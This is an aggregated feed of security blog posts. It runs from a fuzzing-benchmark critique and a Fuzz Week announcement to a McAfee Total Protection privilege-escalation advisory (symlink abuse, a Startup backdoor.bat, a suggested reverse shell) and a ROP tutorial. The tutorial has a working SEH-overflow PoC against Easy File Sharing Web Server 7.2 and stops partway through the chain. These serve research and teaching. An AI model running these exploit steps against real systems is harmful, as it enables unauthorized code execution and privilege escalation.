AFL fork() bottlenecks for me often around 10-20k execs/sec on a single core, and about 40-50k on the whole system, even with 96C/192T systems. This is largely due to just getting stuck on kernel allocations and locks. Spinning up processes is expensive, and largely out of our control. AFL allows access of the local system and kernel to the fuzz case, thus cases are not deterministic, nor are they isolated (in the case of fuzzing something with lock files). This requires using another abstraction layer like docker, which adds more overhead to the equation. My hypervisors that I use for fuzzing can reset a Windows VM 1 million times per second on a single core, and scale linearly with cores, while being deterministic. Why does this matter? Well, we’re comparing tooling which isn’t even remotely hitting the capabilities of the CPUs, rather they’re bottlenecking on the kernel. These are solvable problems, and thus, as a consumer of good ideas but not tooling, I’m interested in what works well. I can make it go fast myself.

Determinism

Most fuzzers that we work with now are not deterministic. You cannot expect instruction-for-instruction determinism between cases. This makes it a lot harder to use complex fuzzing strategies which may rely on the results of a prior execution being identical to a future one. This is largely an engineering problem, and can be solved in both system-level and app-level targets.

Mutation performance

The performance of mutators is often not what it can be. For example, honggfuzz used (now fixed, cheers!) temporary allocations during multiple passes. During its mangle_MemSwap it made a copy of the chunk that was to be swapped, performing 3 memcpys and using a temporary allocation. This logic was able to be implemented using a single memcpy and without a dynamic allocation. This is not a criticism of honggfuzz, but more of an important note of how development often occurs: early prototyping, success, and rare revisiting of what can be changed. What’s my point here? Well, the mutation strategies in many fuzzers may introduce timing properties that are not fundamentally required to have identical behaviors. There’s nothing wrong with this, but it is additional noise which factors into time-based benchmarks. This means a good strategy can be hurt by a bad implementation, or just a naive one that was done early on. This is noise that I think is important to remove from analysis so that we can try to learn what ideas work, and engineer them later.

Further, I don’t know of any mutational fuzzer which doesn’t mutate in-place. This means the multiple splices and removals from an input must end up memcpy()ing the remainder. This is a very common mutation pass. This means every splice or removal costs time proportional to the input size, so the fuzzer slows down sharply as inputs grow. Input size is something we see almost every fuzzer put insane restrictions on (AFL has a fit if you give it anything but a tiny file).

There’s nothing stopping us from making a tree-based fuzzer where a splice adds a node to the tree and updates metadata on other nodes. The input could be serialized once when it’s ready to be consumed, or even better, serialized on-demand, only providing the parts of the file which actually were used during the fuzz case.

Example:

Initial input: "foobar", tree is [pointer to "foobar", length 6]
Splice "baz" at 3: [pointer to "foo", length 3][pointer to "baz", length 3][pointer to "bar", length 3]
Program read()s 3 bytes, return "foo" without serializing the rest
Program crashes, tree can be saved or even just what has read can be saved

In this, the cost is N updates to some basic metadata, where N is the number of mutations performed on that input (often 5-10). On a new fuzz case, you start with an initial input in one node of the tree, and you can once again split it up as needed. Pretty much no memcpy()s need to be performed, nor allocations, as the input can be extended such that in-memory it’s “foobarbaz”, but the metadata describes that the “baz” should come between “foo” and “bar”.
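The "foobar"/"baz" example above can be sketched in Python as a flat list of pieces over one append-only buffer. This is only an illustration under assumptions: the class name `PieceInput` and its methods are hypothetical, a flat list stands in for the tree, and Python's `bytearray` may still reallocate internally when it grows.

```python
class PieceInput:
    """Fuzz input stored as (offset, length) pieces over one append-only buffer.

    Hypothetical sketch: names and layout are illustrative, not taken from any fuzzer.
    """

    def __init__(self, data: bytes):
        self.buf = bytearray(data)        # backing storage, only ever appended to
        self.pieces = [(0, len(data))]    # logical order of the input

    def splice(self, pos: int, data: bytes) -> None:
        """Insert `data` at logical offset `pos` without moving existing bytes."""
        new_piece = (len(self.buf), len(data))
        self.buf += data                  # "foobar" becomes "foobarbaz" in memory
        out, cur, inserted = [], 0, False
        for off, ln in self.pieces:
            if not inserted and cur <= pos <= cur + ln:
                left = pos - cur
                if left:
                    out.append((off, left))
                out.append(new_piece)
                if ln - left:
                    out.append((off + left, ln - left))
                inserted = True
            else:
                out.append((off, ln))
            cur += ln
        if not inserted:
            raise IndexError("splice position past end of input")
        self.pieces = out

    def read(self, start: int, size: int) -> bytes:
        """Serialize only the requested logical range (on-demand serialization)."""
        out, cur, end = bytearray(), 0, start + size
        for off, ln in self.pieces:
            lo, hi = max(start, cur), min(end, cur + ln)
            if lo < hi:
                out += self.buf[off + (lo - cur): off + (hi - cur)]
            cur += ln
            if cur >= end:
                break
        return bytes(out)


inp = PieceInput(b"foobar")
inp.splice(3, b"baz")
print(inp.pieces)        # metadata only; the original bytes never moved
print(inp.read(0, 3))    # the program read()s 3 bytes; nothing else is serialized
```

Only the piece list changes on a splice, which is the "N updates to some basic metadata" cost described above.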

Restructuring the way we do mutations like this allows us to probably easily find 10x improvements in mutator performance (read, not overall fuzzer performance). Meaning, I don’t really want the cost of the mutator to be part of the equation, because once again, it’s likely a result of laziness or simplicity. If something really brings a strategy to the table that is excellent, we can likely make it work just as fast (but likely even faster), than existing strategies.

Not to mention the value in potentially knowing which mutations were used during prior cases, and you could potentially mutate this tree (eg, change a splice from 5 bytes to 8 bytes, without changing the offset, just changing the node in the mutation tree). This could also be used as a mechanism to dynamically weight mutation strategies based on yields, while still getting a performance gain over the naive implementation.

Performance conclusion

From previous work with fuzzers, most of the reset, overhead, and corruption logic is likely not even within an order of magnitude of the possible performance. Thus, I’m far more interested in figuring out what and where strategies work, as the implementations of them are typically not indicative of their performance.

BUT! I recognize the value in treating them as whole systems. I’m a bit more on the hard-core engineering side of the problem. I’m interested in which strategies work, not which tools. There’s definitely value in knowing which tools will work best, given you don’t have the time to tweak or rebuild them yourself. That being said, I think scaling is much more important here, as I don’t know of really anyone doing single-core fuzzing. The results of these fuzzers at scale are likely dramatically different from single-core, and would put some major pressure on some more theoretical ideas which produce way too much information to consume and handle.

Reconstructing the full picture from data

The data I would like to see fuzzbench give, and I’d give you some massive props for doing it, would be the raw, microsecond-timestamped information for each coverage gained.

This means, every time coverage increases, a new CSV record (or whatever format) is generated, including the time stamp when it was found (to the microsecond), as well as the fuzz iteration ID which indicates how many inputs have been run into the fuzzer. This should also include a unique identifier of the block which was found.
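A minimal sketch of such a record stream, assuming a CSV layout with the columns `timestamp_us`, `case_id` and `block_id`. The class name `CoverageLog` and the column names are hypothetical and are not part of fuzzbench or any fuzzer.

```python
import csv
import io
import time


class CoverageLog:
    """Writes one CSV row the first time each block is seen (hypothetical format)."""

    def __init__(self, stream):
        self.writer = csv.writer(stream)
        self.writer.writerow(["timestamp_us", "case_id", "block_id"])
        self.seen = set()

    def report(self, case_id, block_id, now_us=None):
        """Record `block_id` if it is new coverage; return True when a row was written."""
        if block_id in self.seen:
            return False
        self.seen.add(block_id)
        if now_us is None:
            now_us = time.time_ns() // 1000   # wall clock in microseconds
        self.writer.writerow([now_us, case_id, hex(block_id)])
        return True


stream = io.StringIO()
log = CoverageLog(stream)
log.report(case_id=1, block_id=0x401000)
log.report(case_id=2, block_id=0x401000)   # already known, no row written
print(stream.getvalue())
```

Because rows are written only on new coverage, the log shrinks to almost nothing once the fuzzer plateaus.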

This means, in post, the entire progress of the fuzzer can be reconstructed. Every edge, which edges they were, the times they were found, and the case ID they were on when they were found allows comparing not only the raw “edge count” but also the differences between edges found. It’s crazy that this information is not part of the benchmark, as almost all the fuzzers could be finding nearly the same coverage, but a fuzzer which finds less coverage, but completely unique edges, would be devalued.
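As a rough illustration of comparing which edges were found rather than how many, the sketch below assumes each fuzzer produced a CSV with a `block_id` column and that the identifiers are comparable across fuzzers (which is itself an open question). The function names are hypothetical.

```python
import csv
import io


def load_blocks(stream):
    """Collect the set of block identifiers from a coverage CSV (assumed column: block_id)."""
    return {row["block_id"] for row in csv.DictReader(stream)}


def compare(a, b):
    """Split coverage into what both fuzzers found and what each found alone."""
    return {"shared": a & b, "only_a": a - b, "only_b": b - a}


fuzzer_a = io.StringIO("timestamp_us,case_id,block_id\n1,1,0x10\n2,5,0x20\n")
fuzzer_b = io.StringIO("timestamp_us,case_id,block_id\n3,2,0x20\n4,9,0x30\n")
result = compare(load_blocks(fuzzer_a), load_blocks(fuzzer_b))
print(result)   # equal edge counts, but each fuzzer found one block the other missed
```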

This is the firehose of data, but since it’s not collected on an interval, it very quickly turns into almost no data.

Hard problem: What is coverage?

This leads to a really hard problem. How do we compare coverage between tools? Can we safely create a unique block identifier which is universal between all the fuzzers and their targets? I have no idea how fuzzbench solves this (or even if it does). If fuzzbench is relying on the fuzzers to have roughly the same idea of what an edge is, I’d say the results are completely invalid. Having different passes which add different coverage gathering, compare information gathering, could easily affect the graphs. Even just non-determinism in clang (or whatever compiler) would make me uneasy about if afl-clang binaries have identical graph shapes to libfuzzer-clang binaries.

If fuzzbench does solve this problem, I’m curious as to how. I’d anticipate it would be through a coverage pass which is standardized between all targets. If this is the case, are they using the same binaries? If they’re not, are the binaries deterministic, or can the fuzzers affect the benchmark coverage information due to adding their own compiler instrumentation?

Further, if this is the case, it makes it much harder to compare emulators or other tools which gather their own coverage in a unique way. For example, if my emulators, which get coverage for effectively free, had to run an instrumented binary for fuzzbench to get data, it’s not a realistic comparison. My fuzzer would be penalized twice for coverage gathering, even though it doesn’t need the instrumented binary.

Maybe someone solved this problem, and I’m curious what the solution is. TL;DR: Are we actually comparing the same binaries with identical graphs, and is this fair to fuzzers which do not need compile-time instrumentation?

The end

Can’t wait for more discussion. You have been very receptive even when I’m often a bit strongly opinionated. I respect that a lot.

Stay cute,

gamozo

The Current State of Exploit Development, Part 1

6 August 2020 at 00:00

CrowdStrike Blog

As you may or may not know, I work at CrowdStrike for my day job. I am also a part of the red team and do not do any official exploit development/vulnerability research. I wanted to address why binary exploits often aren’t used as much anymore in typical red team toolkits and explain that, although the impact of a binary exploit, especially in the kernel, is far more effective than typical red team TTPs - is the return on investment worth it? I would love to see, personally, some red team research shift towards kernel exploits for local privilege escalation - which is often one of the more difficult parts of a penetration test. But is binary exploitation even worth it at this point for red team work? Let’s find out!

Enjoy! Part 1

Sometimes they come back: exfiltration through MySQL and CVE-2020-11579

28 July 2020 at 14:18
Let’s jump straight to the strange behavior: up until PHP 7.2.16 it was possible by default to exfiltrate local files via the MySQL LOCAL INFILE feature through the connection to a malicious MySQL server. Considering that the previous PHP versions are still the majority in use, these exploits will remain useful for quite some time. As with many other vulnerabilities, after reading about this little-known attack technique (1, 2), I could not wait to find vulnerable software on which to practice such an unusual technique.

McAfee Total Protection (MTP) < 16.0.R26 Escalation of Privilege (CVE-2020-7283)

By: admin
14 July 2020 at 05:37

Summary

Assigned CVE: CVE-2020-7283 has been assigned and RedyOps Labs has been publicly acknowledged by the vendor.

Known to Neurosoft’s RedyOps Labs since: 09/03/2020

Exploit Code: https://github.com/RedyOpsResearchLabs/CVE-2020-7283-McAfee-Total-Protection-MTP-16.0.R26-EoP

Vendor’s Advisory: https://service.mcafee.com/webcenter/portal/oracle/webcenter/page/scopedMD/s55728c97_466d_4ddb_952d_05484ea932c6/Page29.jspx?showFooter=false&articleId=TS103062&leftWidth=0%25&showHeader=false&wc.contextURL=%2Fspaces%2Fcp&rightWidth=0%25&centerWidth=100%25&_adf.ctrl-state=72mvomkv4_9&_afrLoop=1512627449091793#!

An Elevation of Privilege (EoP) vulnerability exists in McAfee Total Protection (MTP) < 16.0.R26. The latest version we tested is McAfee Total Protection (MTP) 16.0.R23. Exploiting this EoP lets a low privileged user create a file anywhere in the system. The file is created with a DACL which allows any user to edit it. Because of this, the attacker can create a file with any chosen name.extension and edit it in order to execute the code of his choice.

If the file already exists, it will be overwritten, with an empty file. 

There are many ways to abuse this issue. We chose to create a bat file in the Users Startup folder C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\backdoor.bat .

Description

Whenever a scan is initiated, the process MMSSHOST.EXE, which runs as NT AUTHORITY\SYSTEM and without impersonation, creates the file c:\ProgramData\McAfee\MSK\settingsdb.dat .

The permissions assigned to this file give “Authenticated Users” full control over the file.

When we first log into the windows system and without performing any actions, the file c:\ProgramData\McAfee\MSK\settingsdb.dat and the files MSK*.dat in the same folder, are not locked (they are not used by any program) and we have the proper permissions in order to delete them.

After we delete these files, we can make “C:\ProgramData\McAfee\MSK\settingsdb.dat”, a symlink to any chosen file.

With the symlink in place, the initiation of a scan will trigger the execution of the MMSSHOST.EXE.

At this point, if we initiate a scan, MMSSHOST.EXE will try to create the file C:\ProgramData\McAfee\MSK\settingsdb.dat , follow the symlink, and actually create the file to which the symlink points.

After that, it will set new permissions on that file, which give “Authenticated Users” full control over the newly created file. Most of the time, the newly created file will remain locked and we will not be able to edit it until we reboot. After the reboot, the file is unlocked and we can edit the file and add any contents we like.

Note: Although we exploited the issue by creating symlinks of the files under the path c:\ProgramData\McAfee\MSK\ , the files under the folder c:\ProgramData\McAfee\MPF\ seem to be affected as well.

Exploitation

In order to Exploit the issue, you can use our exploit from our GitHub .

In the following paragraph, a step by step explanation of the Video PoC where we use the exploit is provided.

Video PoC Step By Step

The exploit takes as an argument the file you want to create .


00:00-02:03: We present the environment. We are low privileged users and as we can see by default, the low privileged users cannot create files under the folder C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup . The folder at the moment is empty.

02:03-02:35: We run the exploit and we pass the file we want to create as argument. In this example we pass as argument the “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\backdoor.bat”. When the exploit instructs us to scan a file, we perform the scan and the file is created.

02:35-03:23: We show that the attacker has full access over the file. Moreover, we add the line “notepad.exe”, which is going to execute notepad.exe in the context of any user who logs into the system. This is a bat file, so you can add the code of your choice (for example a reverse shell).

3:23-end: After the exploitation, another user logs into the system. In our example the administrator. The notepad.exe is executed because of the “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\backdoor.bat” file.

Resources

GitHub

You can find the exploit code in our GitHub at https://github.com/RedyOpsResearchLabs/SEP-14.2-Arbitrary-Write

RedyOps team

The RedyOps team uses the 0-day exploits produced by Research Labs before the vendor releases any patch. They are used in special engagements and only for specific customers.

You can find RedyOps team at https://redyops.com/

Angel

Discovered 0-days which affect the marine sector are communicated to the Angel team. ANGEL has been designed and developed to meet the unique and diverse requirements of the merchant marine sector. It secures the vessel’s business, IoT and crew networks by providing oversight, security threat alerting and control of the vessel’s entire network.

You can find Angel team at https://angelcyber.gr/

Illicium

Our 0-days cannot win Illicium. Today’s information technology landscape is threatened by modern adversary security attacks, including 0-day exploits, polymorphic malware, APTs and targeted attacks. These threats cannot be identified and mitigated using classic detection and prevention technologies; they can mimic valid user activity, do not have a signature, and do not occur in patterns. In response to attackers’ evolution, defenders now have a new kind of weapon in their arsenal: Deception.

You can find Illicium team at https://deceivewithillicium.com/

Neutrify

Discovered 0-days are communicated to the Neutrify team, in order to develop related detection rules. Neutrify is Neurosoft’s 24×7 Security Operations Center, completely dedicated to threat monitoring and attack detection. Beyond just monitoring, Neutrify offers additional capabilities including advanced forensic analysis and malware reverse engineering to analyze incidents.

You can find Neutrify team at https://neurosoft.gr/contact/

The post McAfee Total Protection (MTP) < 16.0.R26 Escalation of Privilege (CVE-2020-7283) appeared first on REDYOPS Labs.

Fuzz Week 2020

12 July 2020 at 07:11

Summary

Welcome to fuzz week 2020! This week (July 13th - July 17th) I’ll be streaming every day going through some of the very basics of fuzzing all the way to cutting edge research. I want to use this time to talk about some things related to fuzzing, particularly when it comes to benchmarking and comparing fuzzers with each other.

Schedule

Ha. There’s really no schedule, there is no script, there is no plan, but here’s a rough outline of what I want to cover.

I will be streaming on my Twitch channel at approximately 14:00 PST. But things aren’t really going to be on a strict schedule.

My Twitter is probably the best source of information for when things are about to start.

Everything will be recorded and uploaded to my YouTube.

July 13th

The very basics of fuzzing. We’ll write our own fuzzer and tweak it to improve it. We’ll probably start by writing it in Python, and eventually talk about the performance ramifications and the basics of scaling fuzzers by using threads or multiple processes. We’ll also compare our newly written fuzzer against AFL and see where AFL outperforms it, and also where AFL has some blind spots.

July 14th

Here we’ll cover code coverage. We might get to this sooner, who knows. But we’re going to write our own tooling to gather code coverage information such that we can see not only how easy it is to set up, but how flexible coverage information can be while still proving quite useful!

July 15th-17th

Here we’ll focus mainly on the advanced aspects of fuzzing. While this sounds complex, fuzzing really hasn’t become that complex yet, so follow along! We’ll go through some of the more deep performance properties of fuzzing, mainly focused around snapshot fuzzing.

Once we’ve discussed some basics of performance and snapshot fuzzing, we’ll start talking about the meaningfulness of comparing fuzzers. Namely, the difficulties in comparing fuzzers when they may involve different concepts of what a crash, coverage, or input are. We’ll look at some existing examples of papers which compare fuzzers, and see how well they actually prove their point.

Biases

I think it’s important when doing something like this, to make it clear what my existing biases are. I’ve got a few.

  • I think existing fuzzers have some major performance problems and struggle to scale. I consider this to be a high priority as general performance improvements to fuzzing harnesses make both generic fuzzers (eg. AFL, context-unaware fuzzers) and hand-crafted (targeted) fuzzers better.
  • I don’t think outperforming AFL is impressive. AFL is impressive because it’s got an easy-to-use workflow, which makes it accessible to many different users, broadening the amount of targets it has been used against.
  • I don’t really think comparing fuzzers is reasonable.
  • I think it is very easy to over-fit a fuzzer to small programs, or add unrealistic amounts of information extraction from a target under test, in a way that the concepts are not generally applicable to many targets that exceed basic parsers. I think this is where a lot of current research falls.

But… that’s mainly the point of this week. To either find out my biases are wildly incorrect, or to maybe demonstrate why I have some of the biases. So, how will I address some of these (in order of prior bullets)?

  • I’ll compare some of my fuzzers against AFL. We’ll see if we can outperform AFL in terms of raw fuzz cases performed, as well as the results (coverage and crashes).
  • I’ll try to demonstrate that a basic fuzzer with 1/100th the amount of code of AFL is capable of getting much better results, and that it’s really not that hard to write.
  • I’ll propose some techniques that can be used to compare fuzzers, and go through my own personal process of evaluating fuzzers. I’m not trying to get papers, or funding, or anything. I don’t really have an interest in making things look comparatively better. If they perform differently, but have different use cases, I’d rather understand those cases and apply them specifically rather than have a one-shoe-fits-all solution.
  • I’ll go through some instrumentation that I’ve historically added to my fuzzers which give them massive result and coverage boosts, but consume so much information that they cannot meaningfully scale past tiny pieces of code. I’ll go through when these things may actually be useful, as sometimes isolating components is viable. I’ll also go through some existing papers and see what sorts of results are being claimed, and if they actually have general applicability.

Winging it

It’s important to note, nothing here is scheduled. Things may go much faster, slower, or just never happen. That’s the beauty of research. I may be very wrong with some of my biases, and we’ll hopefully correct those. I love being wrong.

I’ve maybe thought of having some fuzzing figureheads pop on the stream for random discussions/conversations/interviews. If this is something that sounds interesting to you, reach out and we can maybe organize it!

Sound fun?

See you there :)


Exploit Development: Playing ROP’em COP’em Robots with WriteProcessMemory()

11 July 2020 at 00:00

Introduction

The other day on Twitter, I received a very kind and flattering message about a previous post of mine on the topic of ROP. Thinking about this post, I recall utilizing VirtualProtect() and disabling ASLR system wide to bypass DEP. I also used an outdated debugger, Immunity Debugger at the time, and I wanted to expand on my previous work, with a little bit of a less documented ROP technique and WinDbg.

Why is ROP Important?

ROP/COP and other code reuse apparatuses are very important mitigation bypass techniques, due to their versatility. Binary exploit mitigations have come a long way since DEP. Notably, mitigations such as CFG, upcoming XFG, ACG, etc. have posed an increased threat to exploit writers as time has gone on. ROP still has been the “Swiss army knife” to keep binary exploits alive. ROP can result in arbitrary write and arbitrary read primitives - as we will see in the upcoming post. Additionally, data only attacks with the implementation of ACG have become crucial. It is possible to perform data only attacks, although expensive from a technical perspective, by writing payloads fully in ROP.

What This Blog Assumes and What This Blog ISN’T

If you are interested in a remote bypass of ASLR and a 64-bit version of bypassing DEP, I suggest reading a previous blog of mine on this topic (although, undoubtedly, there are better blogs on this subject).

This blog will not address ASLR or 64-bit exploitation (read my previous post if that is what you are looking for) - and will be utilizing non-ASLR compiled modules, as well as the x86 __stdcall calling convention (technically an “ASLR bypass”, but in my opinion only an information leak = true ASLR bypasses).

Why are these topics not being addressed? This post aims to focus on a different, less documented approach to executing code with ROP. As such, I find it useful to use the most basic, straightforward example to hopefully help the reader fully understand a concept. I am fully aware that it is 2020 and I am well aware mitigations such as CFG are more common. However, generally the last step in exploitation, no matter HOW many mitigations there are (unless you are performing a data only attack), is bypassing DEP (in user mode or kernel mode). This post aims to address the latter portion of the last sentiment - and expects the reader already has an ASLR bypass primitive and a way to pivot to the stack.

Expediting The Process

The application we will be going after is Easy File Sharing Web Server 7.2, which has a memory corruption vulnerability as a result of an HTTP request.

The offset to SEH is 4063 bytes, and the stack pivot lands 2563 bytes into our buffer. Instead of using a pop <reg> pop <reg> ret sequence, as is normally done on a 32-bit SEH exploit, an add esp, <bytes> instruction is used. This will take the stack pointer, which currently points at data we do not control, and move it to an address on the stack that we do control - and then return into it.

import sys
import os
import socket
import struct

# 4063 byte SEH offset
# Stack pivot lands at padding buffer to SEH at offset 2563
crash = "\x90" * 2563

# Stack pivot lands here
# Beginning ROP chain
crash += struct.pack('<L', 0x90909090)

# 4063 total offset to SEH
crash += "\x41" * (4063-len(crash))

# SEH only - no nSEH because of DEP
# Stack pivot to return to buffer
crash += struct.pack('<L', 0x10022869)    # add esp, 0x1004 ; ret: ImageLoad.dll (non-ASLR enabled module)

# 5000 total bytes for crash
crash += "\x41" * (5000-len(crash))

# Replicating HTTP request to interact with the server
# UserID contains the vulnerability
http_request = "GET /changeuser.ghp HTTP/1.1\r\n"
http_request += "Host: 172.16.55.140\r\n"
http_request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n"
http_request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
http_request += "Accept-Language: en-US,en;q=0.5\r\n"
http_request += "Accept-Encoding: gzip, deflate\r\n"
http_request += "Referer: http://172.16.55.140/\r\n"
http_request += "Cookie: SESSIONID=9349; UserID=" + crash + "; PassWD=;\r\n"
http_request += "Connection: Close\r\n"
http_request += "Upgrade-Insecure-Requests: 1\r\n"

print "[+] Sending exploit..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.130", 80))
s.send(http_request)
s.close()

Set a breakpoint on the stack pivot of add esp, 0x1004 ; ret with the WinDbg command bp 0x10022869. After sending the exploit POC - we will need to view the contents of the exception handler with the WinDbg command !exchain.

As a breakpoint has already been set on the address inside of SEH, all that is needed to pass the exception is resuming execution with the g command in WinDbg. The breakpoint is hit, and we will step through the instruction of add esp, 0x1004 (t in WinDbg) to take control of the stack.

As a point of note, we have about 980 bytes to work with.

The Call to WriteProcessMemory()

What is the goal of this method of bypassing DEP? The goal here is not to dynamically change permissions of memory to make it executable - but to instead write our shellcode, dynamically, to already executable memory.

As we know, when DEP is enabled, memory is either writable or executable - but not both at the same time. The previous sentiment about writing shellcode, via WriteProcessMemory(), to executable memory is a bit contradictory knowing this. If memory is executable, adhering to DEP’s rules, it shouldn’t be writable. WriteProcessMemory() overcomes this by temporarily marking memory pages as RWX while data is being written to a destination - even if that destination doesn’t have writable permissions. After the write succeeds, the memory is then marked again as execute only.

From an adversary’s perspective, this means something. Certain shellcodes employ encoding mechanisms to bypass character filtering. If this is the case, encoded shellcode which is dynamically written to execute only memory will fail when executed. This is due to the encoded shellcode needing to “write itself” over adjacent process memory to decode. Since pages are execute only, and we do not have the WriteProcessMemory() “pass” to write to execute only memory anymore, an access violation will occur. Something to definitely keep in mind.

Let’s take a look at the call to WriteProcessMemory() firstly, to help make sense of all of this (per Microsoft Docs)

BOOL WriteProcessMemory(
  HANDLE  hProcess,
  LPVOID  lpBaseAddress,
  LPCVOID lpBuffer,
  SIZE_T  nSize,
  SIZE_T  *lpNumberOfBytesWritten
);

Let’s break down the call to WriteProcessMemory() by taking a look at each function argument.

  1. HANDLE hProcess: According to Microsoft Docs, this parameter is a handle to the desired process in which a user wants to write to the process memory. A handle, without going too much into detail, is a “reference” or “index” to an object. Generally, a handle is used as a “proxy” of sorts to access an object (this is especially true in kernel mode, as user mode cannot directly access kernel mode objects). We will look at how to dynamically resolve this parameter with relative ease. Think of this as “don’t talk to me, talk to my assistant”, where the process is the “me” and the handle is the “assistant”.
  2. LPVOID lpBaseAddress: This parameter is a pointer to the base address in which a write is desired. For example, if the region of memory you would like to write to was 0x11223344 - 0x11223355, the argument passed to the function call would be 0x11223344.
  3. LPCVOID lpBuffer: This is a pointer to the buffer that is to be written to the address specified by the lpBaseAddress parameter. This will be the pointer to our shellcode.
  4. SIZE_T nSize: The number of bytes to be written (whatever the size of the shellcode + NOPs, if necessary, will be).
  5. SIZE_T *lpNumberOfBytesWritten: This parameter is similar to the VirtualProtect() parameter lpflOldProtect, which inherits the old permissions of modified memory. However, our parameter inherits the number of bytes written. This will need to be a memory address, within the process space, that is writable.
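To make the argument order concrete, here is a small sketch of how the five parameters would sit on the stack for an x86 __stdcall call reached through a ret: the function pointer, the address execution returns to afterwards, then the arguments left to right. Every value below is a placeholder chosen for illustration, not an address from the target. The helper name `wpm_frame` is hypothetical, and passing 0xFFFFFFFF (the pseudo-handle GetCurrentProcess() returns) for hProcess is an assumption about how that parameter might be filled.

```python
import struct


def wpm_frame(func, ret, h_process, base, buf, size, written):
    """Pack a __stdcall frame: function pointer, return address, then the 5 arguments."""
    return struct.pack("<7L", func, ret, h_process, base, buf, size, written)


frame = wpm_frame(
    func=0x41414141,       # placeholder: address of WriteProcessMemory()
    ret=0x42424242,        # placeholder: where execution continues after the call
    h_process=0xFFFFFFFF,  # assumption: current-process pseudo-handle (-1)
    base=0x43434343,       # placeholder: lpBaseAddress, executable destination
    buf=0x44444444,        # placeholder: lpBuffer, pointer to the data to copy
    size=0x180,            # placeholder: nSize, number of bytes to write
    written=0x45454545,    # placeholder: lpNumberOfBytesWritten, writable address
)
print(len(frame), frame.hex())
```

A size such as 0x180 packs to bytes containing NULLs, which is one reason values like this usually have to be computed at run time inside the chain rather than embedded literally.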

Preserving a Stack Address

One of the pitfalls of ROP is that stack control is absolutely vital. Why? It is logical actually - each ROP gadget ends with a ret instruction. ret, from a technical perspective, will take the value pointed to by RSP (or ESP in this case), which will be the next ROP gadget on the stack, and load it into RIP (EIP in this case). Since ROP must be performed on the stack, and due to the dynamic nature of the stack, the virtual memory addresses associated with the stack are also dynamic.
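The behavior of ret can be modeled in a few lines of Python. This is a toy model, not an emulator: `memory` is just a bytes object standing in for the stack, and the two DWORDs are gadget addresses that appear later in this post.

```python
import struct


def ret(memory, esp):
    """Model of x86 `ret`: load the DWORD at ESP into EIP, then add 4 to ESP."""
    (eip,) = struct.unpack_from("<L", memory, esp)
    return eip, esp + 4


# Two gadget addresses laid out back to back, as they would be in a ROP chain.
chain = struct.pack("<2L", 0x61C05E8C, 0x10018606)

eip, esp = ret(chain, 0)
print(hex(eip), esp)    # first gadget runs, ESP now points at the second entry
eip, esp = ret(chain, esp)
print(hex(eip), esp)    # the first gadget's own ret transfers to the second gadget
```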

As seen below, when the stack pivot is successfully performed, the virtual address of the stack is 0x029a68dc.

Restarting the application and pivoting to the stack again, the virtual address of the stack is at 0x028068dc.

At first glance, this puts us in a difficult position. Even with knowledge of the base addresses of each module, and their static nature - the stack still seems to change! Although the stack is dynamically being resolved to seemingly “random” and “volatile to the duration of the process” memory - there is a way around this. If we can use a ROP gadget, or set of gadgets, properly - we can dynamically store an address around the stack into a CPU register.

Let’s start our ROP chain by preserving an address near the current stack pointer.

As you may or may not know, the base pointer (EBP) points to the “bottom” of the current stack frame (we will refer to the current stack frame as “the stack”). This means that EBP should be relatively close to ESP. We can validate this in WinDbg by viewing the current state of the CPU registers after the stack pivot.

After parsing the PE with rp++, to enumerate a list of ROP gadgets (you can view how to use rp++ by taking a look at my last ROP blog post) - a nice gadget resides in sqlite3.dll that can help us preserve the address of EBP into another “common” register, which has more useful ROP gadgets as we will see later on, such as EAX.

0x61c05e8c: xchg eax, ebp ; ret  ;  (1 found)

Replace the NOPs in the previous PoC script, under the “Beginning ROP chain” comment, with the above address. After firing off the updated PoC, we land on our intended ROP gadget.

After executing the above gadget, EAX is now loaded with an address near the current stack.

Notice that EBP has also been set to 0, due to the ROP gadget. This will come into play shortly.

Although EAX is relatively close to ESP - it is still a decent ways away. Currently, EAX (which now contains the old value of EBP) is 0xfec bytes away from ESP.

To compensate for this, we will manipulate EAX to contain the address at ESP + 0x38.

Why ESP + 0x38 instead of just ESP you ask? This is a “preparatory” procedure (manipulating EAX to contain the address of ESP + 0x38).

As we will see later on, we would like to preserve an address around ESP into another “common” register, ECX. ECX is a register that is used as a “counter” (although technically it is a general purpose register). This means that ECX generally is a part of some more useful ROP gadgets.

In order to do this, the stack will eventually need to be increased by 0x24 bytes to get the value (technically future value) of ESP into ECX, due to the nature of the ROP gadgets available within the process memory. A ROP gadget will inadvertently perform an add esp, 0x24, resulting in collateral damage to get what we need accomplished, accomplished. There will be 4 ROP gadgets (plus an additional DWORD that will be “popped” into a register), for a total of 0x14 (20 decimal) bytes, that will need to be executed between now and when that add esp, 0x24 gadget is executed (0x38 - 0x24 = 0x14).

This is the reason why we will set EAX to the value of ESP + 0x38 instead of ESP + 0x24, because we will need 0x14 bytes worth of ROP gadgets between then and now. By the time the ROP gadgets before the add esp, 0x24 instruction are executed, the value in EAX will be ESP + 0x24. However, if we loaded ESP + 0x24 into EAX now, then by the time we reach the add esp, 0x24 instruction, EAX will contain a value of ESP + 0x10.
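The offset arithmetic can be checked quickly in Python. The only assumption is the one stated in the text: five 4-byte stack entries (four gadget addresses plus one popped DWORD) are consumed before the add esp, 0x24 instruction runs. The names below are illustrative.

```python
DWORD = 4
entries_before_pivot = 4 + 1                 # four gadget addresses plus one popped value
consumed = entries_before_pivot * DWORD      # bytes ESP advances before add esp, 0x24


def offset_at_pivot(initial_offset):
    """Distance from ESP to the saved address once ESP has advanced by `consumed`."""
    return initial_offset - consumed


print(hex(consumed))                 # bytes used up by the intermediate chain entries
print(hex(offset_at_pivot(0x38)))    # starting at ESP + 0x38
print(hex(offset_at_pivot(0x24)))    # starting at ESP + 0x24 would fall short
```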

Knowing this, and knowing that we would like EAX and ECX to be equal to the current value of ESP after the ESP + 0x38 stack manipulation occurs - we will prepare EAX in advance.

Note that this is by no means a requirement (getting EAX and ECX set to the EXACT value of ESP) when doing ROP. This will just make life easier in the future. If this doesn’t make sense now, do not worry. Just focus on the fact we would like to get EAX closer to ESP for the time being.

0x10018606: pop ecx ; ret  ;  (1 found)
